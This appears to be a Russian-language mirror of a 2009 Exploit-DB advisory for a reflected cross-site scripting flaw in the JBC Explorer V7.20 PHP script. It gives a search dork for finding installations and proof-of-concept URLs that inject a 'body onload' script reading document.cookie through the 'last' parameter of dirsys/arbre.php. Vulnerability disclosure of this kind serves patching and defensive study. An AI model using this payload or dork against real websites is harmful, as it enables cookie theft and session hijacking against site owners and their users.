- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10566
- Проверка EDB
-
- Пройдено
- Автор
- METROPOLIS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-20
Код:
###########################################
#
# Script Name : Explorer V7.20
#
# Version : V7.20 Release Candidate 1 REV A
#
# Bug Type : XSS vulnerability
#
# Found by : Metropolis
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
#
###########################################
PoC :
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]
example :
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
local Example :
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
[ Greetz:
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]- Источник
- www.exploit-db.com
